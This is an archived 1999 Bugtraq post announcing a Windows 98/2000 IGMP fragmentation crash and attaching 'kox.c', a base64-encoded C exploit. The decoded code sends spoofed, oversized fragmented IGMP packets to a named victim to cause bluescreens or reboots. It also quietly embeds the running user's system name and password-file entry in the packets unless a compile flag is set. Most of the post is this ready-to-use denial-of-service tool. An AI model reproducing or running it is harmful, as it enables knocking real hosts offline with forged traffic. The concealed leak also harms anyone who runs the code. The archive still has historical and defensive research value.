 | ||||||
| << Previous | INDEX | Search | src | Set bookmark | Go to bookmark | Next >> |
| ||||||
| |||||||||||||||||||||
Date: Sat, 3 Jul 1999 17:56:29 -0700 From: Coolio <coolio@K-R4D.COM> To: BUGTRAQ@netspace.org Subject: IGMP fragmentation bug in Windows 98/2000 This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --1378956146-1701829432-931049789=:22861 Content-Type: TEXT/PLAIN; charset=US-ASCII Windows 98's TCP/IP stack chokes on fragmented IGMP packets. There is an exploit out there called "fawx" that supposedly exploits this problem, but I haven't had any success crashing Windows with it. Recently I was given source to a program that reliably crashed Win98/98SE/2000 build 2000 and challenged my friend defile to see who could write a version of it utilizing handcrafted igmp/ip headers for source spoofing support. Here is the resulting code that works against most systems with one or two tries. --1378956146-1701829432-931049789=:22861 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="kox.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.BSF.4.02A.9907031756291.22861@leet.k-r4d.com> Content-Description: Content-Disposition: attachment; filename="kox.c" LyoqKg0KCUtveCBieSBDb29saW8gKGNvb2xpb0BrLXI0ZC5jb20pDQoNCgl0 aGlzIHdhcyBhIHN1Y2Nlc3NmdWwgYXR0ZW1wdCB0byBkdXBsaWNhdGUga2xl cHRvL2RlZmlsZSdzIGtvZCB3aW45OA0KCWV4cGxvaXQgYW5kIGFkZCBzcG9v ZmluZyBzdXBwb3J0IHRvIGl0LiBtZSBhbmQgZGVmaWxlIG1hZGUgdGhpcyBh DQoJcmFjZSB0byBzZWUgd2hvIGNvdWxkIGRvIHNwb29maW5nIGtvZCBmaXJz dC4gaGUgd29uLiAobWluZSdzIGJldHRlciEpDQoJbXkga294IGFuZCBkZWZp bGUncyBza29kIG91dHB1dCBhYm91dCB0aGUgc2FtZSBwYWNrZXRzDQoJYnV0 IGhlIGhhZCBza29kIHdvcmtpbmcgYSBmZXcgaG91cnMgYmVmb3JlIGkgaGFk IGtveCB3b3JraW5nLg0KDQoJYWZmZWN0ZWQgc3lzdGVtczogd2luZG93cyA5 OCwgd2luZG93cyA5OCBTRSwgd2luZG93cyAyMDAwIGJ1aWxkIDIwMDANCgly ZXN1bHRzOiBibHVlc2NyZWVuLCB0Y3AvaXAgc3RhY2sgZmFpbHVyZSwgbG9j a3VwLCBvciBpbnN0YW50IHJlYm9vdA0KDQoJdGhhbmtzIHRvIGtsZXB0byBh bmQgZGVmaWxlIGZvciBtYWtpbmcga29kLCBwc2lsb3JkIGZvciB3YW50aW5n DQoJdG8gdW5kZXJzdGFuZCB3aGF0IHdlIHdlcmUgZG9pbmcsIGdyZWcgZm9y IHRlbGxpbmcgbWUgYWJvdXQgaXBoZHIuaWhsLA0KCW1hbmNpZGUgZm9yIGxl dHRpbmcgbWUgdXNlIGhpcyB3aW45OCBib3hlbiB0byB0ZXN0IG9uLCBhbmQg dGhlDQoJZmV3IG90aGVyIHBlb3BsZSBpIGNyYXNoZWQgdHJ5aW5nIHRvIGdl dCB0aGlzIHdvcmtpbmcgcmlnaHQuDQoNCglhbHNvIHRoYW5rcyB0byB0aGUg YXV0aG9ycyBvZiBlbHZpcyBmb3IgbWFraW5nIHN1Y2ggYSBiYWRhc3MgZWRp dG9yLg0KKioqLw0KDQoNCg0KI2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVk ZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQojaW5jbHVkZSA8 bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdHJpbmcuaD4NCiNpbmNsdWRlIDxlcnJu by5oPg0KI2luY2x1ZGUgPHB3ZC5oPg0KI2luY2x1ZGUgPHRpbWUuaD4NCiNp bmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxzeXMvc29ja2V0Lmg+ DQojaW5jbHVkZSA8c3lzL3V0c25hbWUuaD4NCiNpbmNsdWRlIDxuZXRpbmV0 L2luLmg+DQojaW5jbHVkZSA8bmV0aW5ldC9pcC5oPg0KI2luY2x1ZGUgPG5l dGluZXQvaXBfaWNtcC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaWdtcC5oPg0K DQoNCg0Kdm9pZCB1c2FnZShjaGFyICphcmcpDQp7DQoJcHJpbnRmKCJLb3gg YnkgQ29vbGlvIChjb29saW9Aay1yNGQuY29tKVxuIik7DQoJcHJpbnRmKCJV c2FnZTogJXMgPHZpY3RpbT5cbiIsIGFyZyk7DQoJZXhpdCgxKTsNCn0NCg0K DQp1bnNpZ25lZCBpbnQgcmFuZGlwKCkNCnsNCglzdHJ1Y3QgaG9zdGVudCAq aGU7DQoJc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCgljaGFyICpidWYgPSAo Y2hhciAqKWNhbGxvYygxLCBzaXplb2YoY2hhcikgKiAxNik7DQoNCglzcHJp bnRmKGJ1ZiwgIiVkLiVkLiVkLiVkIiwNCgkJKHJhbmRvbSgpJTE5MSkrMjMs DQoJCShyYW5kb20oKSUyNTMpKzEsDQoJCShyYW5kb20oKSUyNTMpKzEsDQoJ CShyYW5kb20oKSUyNTMpKzEpOyANCg0KCWluZXRfYXRvbihidWYsIChzdHJ1 Y3QgaW5fYWRkciAqKSZzaW4pOw0KCXJldHVybiBzaW4uc2luX2FkZHIuc19h ZGRyOw0KfQ0KDQp1bnNpZ25lZCBzaG9ydCBpbl9ja3N1bSh1bnNpZ25lZCBz aG9ydCAqYnVoLCBpbnQgbGVuKQ0Kew0KCXJlZ2lzdGVyIGxvbmcgc3VtID0g MDsNCgl1bnNpZ25lZCBzaG9ydCBvZGRieXRlOw0KCXJlZ2lzdGVyIHVuc2ln bmVkIHNob3J0IGFuc3dlcjsNCg0KCXdoaWxlKGxlbiA+IDEpIHsNCgkJc3Vt ICs9ICpidWgrKzsNCgkJbGVuIC09IDI7DQoJfQ0KDQoJaWYobGVuID09IDEp IHsNCgkJb2RkYnl0ZSA9IDA7DQoJCSooKHVuc2lnbmVkIGNoYXIgKikmb2Rk Ynl0ZSkgPSAqKHVuc2lnbmVkIGNoYXIgKilidWg7DQoJCXN1bSArPSBvZGRi eXRlOw0KCX0NCg0KCXN1bSA9IChzdW0gPj4gMTYpICsgKHN1bSAmIDB4RkZG Rik7DQoJc3VtICs9IChzdW0gPj4gMTYpOw0KCWFuc3dlciA9IH5zdW07DQoJ cmV0dXJuIGFuc3dlcjsNCn0NCg0KaW50IG51a2VfaWdtcChzdHJ1Y3Qgc29j a2FkZHJfaW4gKnZpY3RpbSwgdW5zaWduZWQgbG9uZyBzcG9vZikNCnsNCglp bnQgQklHSUdNUCA9IDE1MDA7DQoJdW5zaWduZWQgY2hhciAqcGt0Ow0KCXN0 cnVjdCBpcGhkciAqaXA7DQoJc3RydWN0IGlnbXBoZHIgKmlnbXA7DQoJc3Ry dWN0IHV0c25hbWUgKnVuOw0KCXN0cnVjdCBwYXNzd2QgKnA7DQoNCglpbnQg aSwgczsNCglpbnQgaWQgPSAocmFuZG9tKCkgJSA0MDAwMCkgKyA1MDA7DQoN Cglwa3QgPSAodW5zaWduZWQgY2hhciAqKWNhbGxvYygxLCBCSUdJR01QKTsN CglpcCA9IChzdHJ1Y3QgaXBoZHIgKilwa3Q7DQoJaWdtcCA9IChzdHJ1Y3Qg aWdtcGhkciAqKShwa3QgKyBzaXplb2Yoc3RydWN0IGlwaGRyKSk7DQoNCglp cC0+dmVyc2lvbiA9IDQ7DQoJaXAtPmlobCA9IChzaXplb2YgKmlwKSAvIDQ7 DQoJaXAtPnR0bCA9IDI1NTsNCglpcC0+dG90X2xlbiA9IGh0b25zKEJJR0lH TVApOw0KCWlwLT5wcm90b2NvbCA9IElQUFJPVE9fSUdNUDsNCglpcC0+aWQg PSBodG9ucyhpZCk7DQoJaXAtPmZyYWdfb2ZmID0gaHRvbnMoSVBfTUYpOw0K CWlwLT5zYWRkciA9IHNwb29mOw0KCWlwLT5kYWRkciA9IHZpY3RpbS0+c2lu X2FkZHIuc19hZGRyOw0KCWlwLT5jaGVjayA9IGluX2Nrc3VtKCh1bnNpZ25l ZCBzaG9ydCAqKWlwLCBzaXplb2Yoc3RydWN0IGlwaGRyKSk7DQoNCglpZ21w LT50eXBlID0gMDsNCglpZ21wLT5ncm91cCA9IDA7DQoJaWdtcC0+Y3N1bSA9 IGluX2Nrc3VtKCh1bnNpZ25lZCBzaG9ydCAqKWlnbXAsIHNpemVvZihzdHJ1 Y3QgaWdtcGhkcikpOw0KDQoJZm9yKGkgPSBzaXplb2Yoc3RydWN0IGlwaGRy KSArIHNpemVvZihzdHJ1Y3QgaWdtcGhkcikgKyAxOw0KCSAgICBpIDwgQklH SUdNUDsgaSsrKQ0KCQlwa3RbaV0gPSByYW5kb20oKSAlIDI1NTsNCiNpZm5k ZWYgSV9HUk9LDQoJdW4gPSAoc3RydWN0IHV0c25hbWUgKikocGt0ICsgc2l6 ZW9mKHN0cnVjdCBpcGhkcikgKw0KCSAgICAgIHNpemVvZihzdHJ1Y3QgaWdt cGhkcikgKyA0MCk7DQoJdW5hbWUodW4pOw0KCXAgPSAoc3RydWN0IHBhc3N3 ZCAqKSgodm9pZCAqKXVuICsgc2l6ZW9mKHN0cnVjdCB1dHNuYW1lKSArIDEw KTsNCgltZW1jcHkocCwgZ2V0cHd1aWQoZ2V0dWlkKCkpLCBzaXplb2Yoc3Ry dWN0IHBhc3N3ZCkpOw0KI2VuZGlmDQoJaWYoKHMgPSBzb2NrZXQoQUZfSU5F VCwgU09DS19SQVcsIElQUFJPVE9fUkFXKSkgPCAwKSB7DQoJCXBlcnJvcigi ZXJyb3I6IHNvY2tldCgpIik7DQoJCXJldHVybiAxOw0KCX0NCg0KCWlmKHNl bmR0byhzLCBwa3QsIEJJR0lHTVAsIDAsIHZpY3RpbSwNCgkgICBzaXplb2Yo c3RydWN0IHNvY2thZGRyX2luKSkgPT0gLTEpIHsJDQoJCXBlcnJvcigiZXJy b3I6IHNlbmR0bygpIik7DQoJCXJldHVybiAxOw0KCX0NCgl1c2xlZXAoMTAw MDAwMCk7DQoNCglmb3IoaSA9IDE7IGkgPCA1OyBpKyspIHsNCgkJaWYoaSA+ IDMpDQoJCQlpcC0+ZnJhZ19vZmYgPSBodG9ucygoKEJJR0lHTVAtMjApICog aSkgPj4gMyk7DQoJCWVsc2UNCgkJCWlwLT5mcmFnX29mZiA9IGh0b25zKCgo QklHSUdNUC0yMCkgKiBpKSA+PiAzIHwgSVBfTUYpOw0KCQlzZW5kdG8ocywg cGt0LCBCSUdJR01QLCAwLCB2aWN0aW0sIHNpemVvZihzdHJ1Y3Qgc29ja2Fk ZHJfaW4pKTsNCgkJdXNsZWVwKDIwMDAwMDApOw0KCX0NCg0KCWZyZWUocGt0 KTsNCgljbG9zZShzKTsNCglyZXR1cm4gMDsNCn0NCg0KaW50IG1haW4oaW50 IGFyZ2MsIGNoYXIgKmFyZ3ZbXSkNCnsNCglzdHJ1Y3Qgc29ja2FkZHJfaW4g dmljdGltOw0KCXN0cnVjdCBob3N0ZW50ICpoZTsNCglpbnQgaTsNCg0KCXNy YW5kb20odGltZShOVUxMKSk7DQoNCglpZihhcmdjIDwgMikNCgkJdXNhZ2Uo YXJndlswXSk7DQoNCglpZigoaGUgPSBnZXRob3N0YnluYW1lKGFyZ3ZbMV0p KSA9PSBOVUxMKSB7DQoJCWhlcnJvcihhcmd2WzFdKTsNCgkJZXhpdCgxKTsN Cgl9DQoJbWVtY3B5KCZ2aWN0aW0uc2luX2FkZHIuc19hZGRyLCBoZS0+aF9h ZGRyLCBoZS0+aF9sZW5ndGgpOw0KCXZpY3RpbS5zaW5fcG9ydCA9IGh0b25z KDApOw0KCXZpY3RpbS5zaW5fZmFtaWx5ID0gUEZfSU5FVDsNCg0KCXByaW50 ZigiSUdNUD4gIik7DQoJZmZsdXNoKHN0ZG91dCk7DQoJZm9yKGkgPSAwOyBp IDwgMTA7IGkrKykNCgl7DQoJCW51a2VfaWdtcCgmdmljdGltLCByYW5kaXAo KSk7DQoJCXByaW50ZigiLiIpOw0KCQlmZmx1c2goc3Rkb3V0KTsNCgl9DQoJ cHJpbnRmKCJcbiIpOw0KCWZmbHVzaChzdGRvdXQpOw0KfQ0K --1378956146-1701829432-931049789=:22861--
| |||||||||||||||||||||